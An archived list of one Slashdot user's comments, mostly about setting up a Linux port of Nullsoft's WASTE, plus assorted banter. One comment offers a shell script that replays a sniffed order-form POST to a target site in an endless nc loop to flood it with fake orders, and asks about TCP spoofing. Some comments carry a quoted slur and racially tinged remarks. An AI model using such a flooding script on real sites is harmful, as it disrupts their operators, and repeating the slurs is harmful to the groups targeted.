Slashdot Mirror


User: grazzy

grazzy's activity in the archive.

Stories
0
Comments
605
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 605

  1. Re:Linux port ? on Nullsoft's Waste: Encrypted, Distributed, Mesh Net · · Score: 2

    Binary mirrors:
    http://130.236.227.49/waste.zip
    http:// grazzy.mjoelkbar.net/waste/waste.zip

    Source mirrors:
    http://grazzy.mjoelkbar.net/waste/waste- source.tar .gz

  2. Re:Linux port ? on Nullsoft's Waste: Encrypted, Distributed, Mesh Net · · Score: 2, Informative
  3. Re:Linux port ? on Nullsoft's Waste: Encrypted, Distributed, Mesh Net · · Score: 1

    see tutorial on: http://grazzy.mjoelkbar.net/waste/

  4. Re:Linux port ? on Nullsoft's Waste: Encrypted, Distributed, Mesh Net · · Score: 3, Informative

    This code actually does work, with this patch you are able to both transfer files, connect, and chat.

    The tricky thing is to set up the server properly.

    The easiest way is like someone else pointed out to make a new profile in waste, (copy your own default.pr* files out of the way first).

    Then, add your public SERVER key to your public-key list in the windows-client. And add your public-windows-client-key to the list of keys of the server.. (default.pr3).

    Dont forget to NOT use a network name ( or make sure they are the same in your default.pr0 files).

    If you want to join my server contact me on icq: 706826, or see http://waste.mjoelkbar.net/ which will be online soon.

  5. Re:Linux port ? on Nullsoft's Waste: Encrypted, Distributed, Mesh Net · · Score: 1

    i basiclly did this, first i created a private set off keys, i moved them to another folder, made a new set of keys that i copied to my serverfolder..

    it doesnt seem to want to connect though..

  6. Re:Linux port ? on Nullsoft's Waste: Encrypted, Distributed, Mesh Net · · Score: 1

    this patch is incorporated in http://grazzy.mjoelkbar.net/waste-linux.tar.gz

    this source compiles on:
    quake:~/public_html$ gcc -v
    Reading specs from /usr/lib/gcc-lib/i386-slackware-linux/egcs-2.91.66 /specs
    gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)

    but NOT on:
    [grazzy@mircosoft grazzy]$ gcc -v
    Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
    gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)

    (take a guess why :)) ....

    however it doesnt seem to work very good, no connecting can be done, thus you can temporarily connect to my host at 130.236.227.49:1337

    my public key is:
    WASTE_PUBLIC_KEY 20 1536 grazzy
    9F564C80F1DC66AEAE566DBB5DF2523D3502D6A412 24997034 944FC1A66A
    CCFE3327801557EE6F0BEFC7D245D25BCD083C 16F53AA42571 AE9B4D1375
    EF95452E69E84BA9A31FCC58210AFD404D2DD1 43EA9D1197D2 EF33218DF9
    8BF60FBB36EBC01AFA8494A123FD47AF852187 752651CBEB80 D9FB846843
    E0D9C9D9490C1102E6892DC042452FE09DA360 5242978F2644 82A2E1CABC
    08F4FC0A7C06C97D6254FE2C33CF1FFAB1C198 38CFF1250399 80755DF06C
    E0556AF4C4E7BF21994C70070003010001
    WA STE_PUBLIC_KEY_END

  7. Re:Linux port ? on Nullsoft's Waste: Encrypted, Distributed, Mesh Net · · Score: 1

    [grazzy@mircosoft waste]$ ./wastesrv
    WASTE server 1.0a0 starting up...
    initializing RNG
    done
    loading config from ./default.pr0
    Illegal instruction (core dumped)

    --- strace output : ...

    gettimeofday({1054213105, 239469}, NULL) = 0
    gettimeofday({1054213105, 240923}, NULL) = 0
    write(1, "loading config from ./default.pr"..., 34loading config from ./default.pr0
    ) = 34
    write(1, "damp\n", 5damp
    ) = 5
    open("./default.pr0", O_RDONLY) = 3
    fstat64(3, {st_mode=S_IFREG|0744, st_size=349, ...}) = 0
    old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40018000
    read(3, "[profile]\ndownloadpath=\nnick=gra"..., 4096) = 349
    --- SIGILL (Illegal instruction) ---
    +++ killed by SIGILL +++

    ---

    Looks like it crashes at line 590 in srvmain.cpp

    g_config = new C_Config(tmp);

    Not sure thought..

    It also looks like it could be something strange about the format of my default.pr0, look at the straceoutput.. i tried fiddeling around a bit with it (changing from ansi->dos->unix->oem) in ultraedit etc.. but it doesnt seem to make any diffrence.

    Btw, after you got it running i suppose you start giving away yuour public key and ip to friends so they can connect ...?

  8. Re:Linux port ? on Nullsoft's Waste: Encrypted, Distributed, Mesh Net · · Score: 1

    it crashes when run for me.. any clue? :)

  9. Re:Napster baaad, Kazaa wooorse on Kazaa Says On Track to Be Most-Downloaded Program · · Score: 1

    because there might be 100 cds worth 5$, but only 1-5 worth 24$ ..

  10. Re:Uhm... on Nmap Featured in The Matrix Reloaded · · Score: 1

    are you sure the matrix is fake?
    evidence please ;)

  11. Re:how about encryption? on TopCoder, Math, and Game Programming · · Score: 2, Funny

    and not just that! you have a raise every month!

  12. i've got an own solution to the spamproblem. on Spam Blackhole Lists Redux · · Score: 1

    i spam their order-databases...
    i'll soon rewrite this script to randomize all data, such as headers etc. anyone know if tcp-spoof is possible?

    -----
    #!/bin/sh

    tmpid=1
    while [ 1 ]; do
    cat victim.txt|sed s/_ID_/$tmpid/g|nc victim.com 80 &> /dev/null
    echo $tmpid
    tmpid=`expr $tmpid + 1`

    done

    ---

    not very cool code, but it does it job. victim.txt is a logfile from sniffit when i POST their order-form on their website.

    have fun buying stuff! :-)

  13. Re:How I feel about programming competitions on KTH Game Awards Grande Finale · · Score: 2, Funny

    how about working for the ministry of offence.. errr..
    what would the deparment of DEFENCE do with a warhead..

  14. Re:What is an acceptable risk? on Shuttle Politics · · Score: -1, Offtopic

    by I'm a racist. (631537)

    ... Sure, the people on board the shuttle are worth more than those aboard commercial flights ...
    ... Down with Saudi Arabia ...



    I'm beginning to see how americans reason about going to war with other countries now..

  15. Re:As we have known all along on Interview with Student Sued by RIAA · · Score: 1

    ha! mine got 1.8M :)

  16. Re:Fictional Writer on Deus Ex Writer Discusses 'Dangerous Technology' · · Score: 1

    Yeah, I kinda guessed that, but then call it Ebola-HIV for clearance ;) Hiv does after all cause AIDS..

    Is AIDS a disease or just a state of HIV? And his parallels to deus ex where some organisation blackmails goverments is kinda silly, science is afaik a fairly open community, atleast in medicin, right? ;)

  17. Re:Fictional Writer on Deus Ex Writer Discusses 'Dangerous Technology' · · Score: 1

    no, but you cant be infected by the AIDS-virus, hiv is the virus that infects. and mbeki believes hiv does not cause aids, hence its only in his head there can be a ebola-aids-virus.

    (but to be 100% correct he believes aids to be caused by bad food habits and living in the slum, and im sure you know he'd be very upset if we western foreigners said his fellow countrymen got this dirty sexually transferable disease - just because they're black doesnt mean they have sex does it?)

    btw, i guess whatever language they speak in iraq isnt your favourite language?

  18. Re:Fictional Writer on Deus Ex Writer Discusses 'Dangerous Technology' · · Score: 1

    Well, not to be picky, but hes written Ebola-AIDS virus like 5 times in the text and afaik there is nothing such as a aids-virus, except for maybe in southafrican pres. mbekis head.

  19. Re:THANKS ARPI! on MPlayer 0.90 released; MPlayer Maintainer Leaves · · Score: 1

    i remember things about very upset people screaming "ripoff,ripoff" when i hear this.. i might be wrong .. someone forgot to mention someone else in their grand release of a version capable of playing asf.. .

  20. Re:OFFTOPIC - "rm -rf" hint on Red Hat Linux 9 Release And Interview · · Score: 1

    whoa, i'd been lucky if it was ~/ and not / i typed before hitting enter...

  21. Re:Interesting, same results .. oh .. on Google Vs. Yahoo: When We Last Met... · · Score: 1

    but thats easily changed ... just set a cookie. mhh, cookies.

  22. pah, yahoo.com is totally useless on Google Vs. Yahoo: When We Last Met... · · Score: 5, Interesting

    google has a clean and fast interface, i dont want to load 10kb of bloat every time i enter a keyword to search for.

  23. Re:In the wild or not? on Exploit Found in Seti@Home · · Score: 2, Informative

    you have to spoof and take over a connection to be able to exploit this vuln.

    ie, you could only do it on a local net.. however i guess pretty many people are running seti in the doorms around me..

  24. Re:HA HA HA HA BOWIE YOU ONE FUNNY FAGGOT!!! on 30 Years of Cell Phone Calls · · Score: -1, Offtopic

    this is so retarded.. replying to your own comment? what am i missing here?

  25. Re:why just DeCSS? on Jon Johansen To Be Retried On Piracy Charges · · Score: 1

    Btw, looking at the page you linked to in your post (http://www.dvddecrypter.com/) I found a very funny post :) ------------ I just want to take this opportunity to let you all know about the amount of 'RIP OFF' DVD software out there. It has come to my attention that the following DVD Compilation packages just provide you with a bunch of FREEWARE tools and some lame guides written by companies themselves, or some decent ones that they have stolen from places like www.doom9.org. DVD Squeeze DVD Cutter DVD Echo DVD Copy Gold If you pay for any of the above, you're totally mad and should ask for a refund instantly. A note to the companies: I am totally fed up with providing support for people buying MY software from you. I dont know how you can sleep at night, knowing full well that you are ripping people off. I hope you all get shut down. -------- The "rip off" dvd software. poor guy, someones ripping the pirates off. damn bastards :)